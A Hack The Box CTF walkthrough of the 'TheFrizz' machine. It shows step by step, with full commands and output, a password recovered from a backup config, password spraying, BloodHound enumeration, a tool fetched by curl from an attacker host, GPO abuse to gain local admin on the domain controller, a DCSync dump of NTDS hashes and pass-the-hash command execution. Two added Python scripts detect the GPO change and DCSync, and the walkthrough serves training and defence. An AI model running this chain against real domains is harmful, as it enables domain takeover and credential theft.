┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ mkdir backup                                                                                                                                                           
                                                                                                                                                                           
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ cd backup                                                                                                                                                              

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/backup]
└─$ 7z x ../wapt-backup-sunday.7z                                                                                                                                          
                                                                                                                                                                           
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03                                                                                                       
<snipped>                                                                                                                                                      

Everything is Ok                                                            

Folders: 684
Files: 5384
Size:       141187501
Compressed: 30416987

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/backup]
└─$ ls
wapt

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/backup]
└─$ cd wapt      

┌──(kali㉿kali)-[~/…/HackTheBox/TheFrizz/backup/wapt]
└─$ ls -la
total 45012
drwxrwxr-x 18 kali kali    4096 Oct 23  2024 .
drwxrwxr-x  3 kali kali    4096 Sep 18 07:09 ..
-rw-rw-r--  1 kali kali    6147 Sep 11  2024 auth_module_ad.py
drwxrwxr-x  3 kali kali    4096 Oct 23  2024 cache
-rw-rw-r--  1 kali kali  412462 Sep 11  2024 common.py
drwxrwxr-x  2 kali kali    4096 Oct 23  2024 conf
drwxrwxr-x  2 kali kali    4096 Oct 23  2024 conf.d
-rw-rw-r--  1 kali kali    5730 Sep 11  2024 COPYING.txt
<snipped>

We have a conf folder.

Let's see what files are in it:

┌──(kali㉿kali)-[~/…/HackTheBox/TheFrizz/backup/wapt]                                
└─$ cd conf                                                                          
                                                                                     
┌──(kali㉿kali)-[~/…/TheFrizz/backup/wapt/conf]                                      
└─$ ls                                                                               
ca-192.168.120.158.crt  ca-192.168.120.158.pem  forward_ssl_auth.conf  require_ssl_auth.conf  uwsgi_params  waptserver.ini  waptserver.ini.template

One of the files, waptserver.ini, has a juicy string:

┌──(kali㉿kali)-[~/…/TheFrizz/backup/wapt/conf]                                      
└─$ cat waptserver.ini                                                               
[options]                                                                            
allow_unauthenticated_registration = True                                            
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt

[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log


┌──(kali㉿kali)-[~/…/TheFrizz/backup/wapt/conf]
└─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d           
!suBcig@MehTed!R

Spray it across all users:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u users.txt -p '!suBcig@MehTed!R' --continue-on-success
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED 
<snipped>
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED 
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R 
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\d.hudson:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED 
<snipped>

We have another valid domain user's password.

BloodHound:

Now it's time for BloodHound.

Run the ingesters:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/bloodhound]
└─$ rusthound-ce -k -u f.frizzle -d frzzdc.frizz.htb -f frizzdc.frizz.htb -i 10.129.20.43 -n 10.129.20.43
---------------------------------------------------
Initializing RustHound-CE at 05:50:56 on 09/18/25
Powered by @g0h4n_0
---------------------------------------------------

[2025-09-18T02:50:56Z INFO  rusthound_ce] Verbosity level: Info
[2025-09-18T02:50:56Z INFO  rusthound_ce] Collection method: All
[2025-09-18T02:51:00Z INFO  rusthound_ce::ldap] Connected to FRZZDC.FRIZZ.HTB Active Directory!
[2025-09-18T02:51:00Z INFO  rusthound_ce::ldap] Starting data collection...
[2025-09-18T02:51:00Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:02Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=frizz,DC=htb
[2025-09-18T02:51:02Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:07Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=frizz,DC=htb
[2025-09-18T02:51:07Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=frizz,DC=htb
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=frizz,DC=htb
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=frizz,DC=htb
[2025-09-18T02:51:11Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-18T02:51:11Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 22 users parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_users.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 61 groups parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_groups.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_computers.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 2 ous parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_ous.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_domains.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_gpos.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 73 containers parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_containers.json created!

RustHound-CE Enumeration Completed at 05:51:11 on 09/18/25! Happy Graphing!

Start BloodHound:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/bloodhound]
└─$ sudo bloodhound         
[sudo] password for kali: 

 Starting neo4j
<snipped>

 Bloodhound will start

 IMPORTANT: It will take time, please wait...


 opening http://127.0.0.1:8080
<snipped>

Searching for outbound object control for m.schoolbus, we find that this user is a member of the Group Policy Creator Owners group:

That group in turn has WriteGPLink over the Domain Controllers OU:

Shell as m.schoolbus:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ impacket-getTGT 'frizz.htb/M.SchoolBus:!suBcig@MehTed!R' -dc-ip 10.129.20.43
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in M.SchoolBus.ccache

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ export KRB5CCNAME=M.SchoolBus.ccache     

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ klist                      
Ticket cache: FILE:M.SchoolBus.ccache
Default principal: M.SchoolBus@FRIZZ.HTB

Valid starting       Expires              Service principal
09/18/2025 07:18:20  09/18/2025 17:18:20  krbtgt/FRIZZ.HTB@FRIZZ.HTB
        renew until 09/19/2025 07:18:20
        
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ ssh m.schoolbus@frizz.htb
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>

We can use various tools to abuse this WriteGPLink ACL. I will use SharpGPOAbuse.exe:

PS C:\Users\M.SchoolBus> cd C:\Windows\Tasks
PS C:\Windows\Tasks> curl http://10.10.16.2/SharpGPOAbuse.exe -o SharpGPOAbuse.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 71168  100 71168    0     0  72640      0 --:--:-- --:--:-- --:--:-- 72620
PS C:\Windows\Tasks> ls

    Directory: C:\Windows\Tasks

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---           9/17/2025  6:57 PM        9760768 chisel.exe
-a---           9/17/2025  9:21 PM          71168 SharpGPOAbuse.exe

View sharpgpoabuse options and attacks:

PS C:\Windows\Tasks> .\SharpGPOAbuse.exe

Usage: 
        SharpGPOAbuse.exe <AttackType> <AttackOptions>

Attack Types:
--AddUserRights
        Add rights to a user account
--AddLocalAdmin
        Add a new local admin. This will replace any existing local admins!
--AddComputerScript
        Add a new computer startup script
--AddUserScript
        Add a new user startup script
--AddComputerTask
        Add a new computer immediate task
--AddUserTask
        Add a new user immediate task


Options required to add a new local admin: 
--UserAccount
        Set the name of the account to be added in local admins.
--GPOName
        The name of the vulnerable GPO.


Options required to add a new user startup script:
--ScriptName
        Set the name of the new startup script.
--ScriptContents
        Set the contents of the new startup script.
--GPOName
        The name of the vulnerable GPO.


Options required to add a new computer startup script:
--ScriptName
        Set the name of the new startup script.
--ScriptContents
        Set the contents of the new startup script.
--GPOName
        The name of the vulnerable GPO.


Options required to add new user rights:
--UserRights
        Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
--UserAccount
        Set the account to add the new rights.
--GPOName
        The name of the vulnerable GPO.


Options required to add a new computer immediate task:
--TaskName
        Set the name of the new computer task.
--Author
        Set the author of the new task (use a DA account).
--Command
        Command to execute.
--Arguments
        Arguments passed to the command.
        Enable Target Filtering for user immediate tasks.
--TargetUsername
        The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
--TargetUserSID
        The targeted user's SID.           


Other options:
--DomainController
        Set the target domain controller.  
--Domain
        Set the target domain.             
--Force
        Overwrite existing files if required.

So we can abuse this write link with a variety of attacks, one of them being adding ourselves to the local Administrators group.

But first we have to create a GPO, and link it to the domain controllers OU:

PS C:\Windows\Tasks> New-GPO -Name "Windows Firewall GPO" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
                                           
GpoId       : 68ce3cbc-c645-4c4e-9bcc-ebd0f9bd61c0
DisplayName : Windows Firewall GPO
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 3

Now we can abuse that GPO with sharpgpoabuse:

PS C:\Windows\Tasks> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount m.schoolbus --GPONAME "Windows Firewall GPO"                                                        
[+] Domain = frizz.htb                     
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of m.schoolbus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "Windows Firewall GPO" is: {68CE3CBC-C645-4C4E-9BCC-EBD0F9BD61C0}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{68CE3CBC-C645-4C4E-9BCC-EBD0F9BD61C0}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

Now we need to refresh the policies:

PS C:\Windows\Tasks> gpupdate /force                                                                                                                                       
Updating policy...                         

Computer Policy update has completed successfully.
User Policy update has completed successfully.

Check if we are now admins:

PS C:\Windows\Tasks> net user m.schoolbus                                             
User name                    M.SchoolBus
Full Name                    Marvin SchoolBus
Comment                      Desktop Administrator
User''s comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/29/2024 7:27:03 AM
Password expires             Never
Password changeable          10/29/2024 7:27:03 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/17/2025 9:19:45 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users         *Desktop Admins
The command completed successfully.

PS C:\Windows\Tasks> exit
Connection to frizz.htb closed.

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u m.schoolbus -p '!suBcig@MehTed!R'                 
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\m.schoolbus:!suBcig@MehTed!R (Pwn3d!)
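From the defender's side, the artifact this attack leaves behind is a Restricted Groups entry in GptTmpl.inf under SYSVOL. The following is an added audit script (my own code, not part of the writeup or SharpGPOAbuse) that parses that file and flags SIDs pushed into BUILTIN\Administrators outside an assumed baseline of Domain Admins (RID 512) and Enterprise Admins (RID 519); the sample template and the baseline are constructed assumptions.

```python
import configparser
import re
import sys
from typing import Dict, List

# SID of the built-in Administrators group that the AddLocalAdmin attack targets.
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
# RIDs a site normally expects to see pushed into local Administrators by policy
# (assumption: 512 = Domain Admins, 519 = Enterprise Admins form the baseline here).
BASELINE_RIDS = {"512", "519"}

# Constructed sample modelled on the GptTmpl.inf the writeup shows being created
# under ...\Machine\Microsoft\Windows NT\SecEdit\; the member SID is m.schoolbus's
# SID as printed by the tool. Real files are UTF-16LE: open(path, encoding="utf-16").
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-2386970044-1145388522-2932701813-1106
"""

def parse_group_membership(text: str) -> Dict[str, List[str]]:
    """Return {group_sid: [member_sids]} from the [Group Membership] section.
    A *<group>__Members line is a Restricted Groups 'replace' rule: the listed
    members become the ONLY members of that group on every machine in scope."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str  # keep '*S-1-5-...' keys exactly as written
    cp.read_string(text)
    members: Dict[str, List[str]] = {}
    if not cp.has_section("Group Membership"):
        return members
    for key, value in cp.items("Group Membership"):
        m = re.fullmatch(r"\*(S-[\d-]+)__Members", key.strip())
        if m:
            members[m.group(1)] = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
    return members

def flag_unexpected_admins(text: str) -> List[str]:
    """Member SIDs pushed into BUILTIN\\Administrators whose RID is not in the baseline."""
    sids = parse_group_membership(text).get(BUILTIN_ADMINISTRATORS, [])
    return [sid for sid in sids if sid.rsplit("-", 1)[-1] not in BASELINE_RIDS]

if __name__ == "__main__":
    # Usage: python audit_gpttmpl.py [path-to-GptTmpl.inf]; defaults to the sample.
    text = open(sys.argv[1], encoding="utf-16").read() if len(sys.argv) > 1 else SAMPLE_GPTTMPL
    for sid in flag_unexpected_admins(text):
        print(f"[!] Restricted Groups adds unexpected SID to Administrators: {sid}")
```

Running this over every Policies\{GUID}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf in SYSVOL, together with alerting on new gPLink values for the Domain Controllers OU, catches this technique before the next refresh cycle applies it.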

Post-Exploitation:

DCSync Attack:

We can now perform the DCSync attack to get the ntlm hash of the domain administrator.

I will do that with netexec this time:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u m.schoolbus -p '!suBcig@MehTed!R' --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] 
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\m.schoolbus:!suBcig@MehTed!R (Pwn3d!)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         frizzdc.frizz.htb 445    frizzdc          Administrator:500:aad3b435b51404eeaad3b435b51404ee:c457b5f1c315bef53b9cabc92e993d0b:::
<snipped>
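DCSync requests are visible on the DC as event 4662 entries whose Properties field carries the directory replication control-access-right GUIDs. The following is an added detection example (my own code, not from the writeup or netexec) that filters such events for accounts that are not domain controller computer accounts; the event records are constructed and simplified, and the assumption that FRIZZDC$ is the only legitimate replicator comes from this box having a single DC.

```python
import re
from typing import Dict, List

# Control-access-right GUIDs recorded in the Properties field of a 4662 event when
# an account requests directory replication (the well-known AD extended rights).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Accounts legitimately allowed to replicate: DC computer accounts. Assumption:
# frizzdc is the only DC here, as the writeup's BloodHound output (1 computer) shows.
EXPECTED_REPLICATORS = {"FRIZZDC$"}

# Constructed, simplified 4662 records using the Windows event field names.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 4662, "SubjectDomainName": "frizz", "SubjectUserName": "FRIZZDC$",
     "ObjectServer": "DS", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "frizz", "SubjectUserName": "m.schoolbus",
     "ObjectServer": "DS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "frizz", "SubjectUserName": "f.frizzle",
     "ObjectServer": "DS", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

def replication_rights_in(event: Dict) -> List[str]:
    """Names of replication rights referenced by the event's Properties field."""
    guids = (g.lower() for g in GUID_RE.findall(event.get("Properties", "")))
    return [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]

def detect_dcsync(events: List[Dict]) -> List[Dict]:
    """Flag 4662 DS events where a non-DC account exercised replication rights."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("ObjectServer") != "DS":
            continue
        rights = replication_rights_in(ev)
        if not rights or ev["SubjectUserName"].upper() in EXPECTED_REPLICATORS:
            continue
        alerts.append({"account": f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}',
                       "rights": rights})
    return alerts

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"[!] possible DCSync by {a['account']}: {', '.join(a['rights'])}")
```

The rule only fires if 4662 auditing is enabled for directory service access (Audit Directory Service Access) with a SACL on the domain head covering replication rights.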

We can now get the flags:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ nxc smb frizzdc.frizz.htb -k -u administrator -H c457b5f1c315bef53b9cabc92e993d0b -X 'whoami;hostname;ipconfig;type C:\Users\Administrator\Desktop\root.txt;type C:\Users\f.frizzle\Desktop\user.txt'
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)                                 
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\administrator:c457b5f1c315bef53b9cabc92e993d0b (Pwn3d!)                                                
SMB         frizzdc.frizz.htb 445    frizzdc          [+] Executed command via wmiexec                                                                                     
SMB         frizzdc.frizz.htb 445    frizzdc          frizz\administrator                                                                                                  
SMB         frizzdc.frizz.htb 445    frizzdc          frizzdc                                                                                                              
SMB         frizzdc.frizz.htb 445    frizzdc          Windows IP Configuration                                                                                             
SMB         frizzdc.frizz.htb 445    frizzdc          Ethernet adapter Ethernet0 2:                                                                                        
SMB         frizzdc.frizz.htb 445    frizzdc             Connection-specific DNS Suffix  . : .htb                                                                          
SMB         frizzdc.frizz.htb 445    frizzdc             IPv6 Address. . . . . . . . . . . : dead:beef::339b:6039:c571:9f0c                                                
SMB         frizzdc.frizz.htb 445    frizzdc             Link-local IPv6 Address . . . . . : fe80::903f:7dc4:c0ba:362e%5                                                   
SMB         frizzdc.frizz.htb 445    frizzdc             IPv4 Address. . . . . . . . . . . : 10.129.20.43                                                                  
SMB         frizzdc.frizz.htb 445    frizzdc             Subnet Mask . . . . . . . . . . . : 255.255.0.0                                                                   
SMB         frizzdc.frizz.htb 445    frizzdc             Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%5                                                    
SMB         frizzdc.frizz.htb 445    frizzdc                                                 10.129.0.1                                                                    
SMB         frizzdc.frizz.htb 445    frizzdc          #< CLIXML                                                                                                            
SMB         frizzdc.frizz.htb 445    frizzdc          4ebba94604de0fcec8619fe5d85143ee                                                                                     
SMB         frizzdc.frizz.htb 445    frizzdc          32f33794e20e852937ce93e1d75ea46f                                                                                     
SMB         frizzdc.frizz.htb 445    frizzdc          <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId
="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0<
/AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
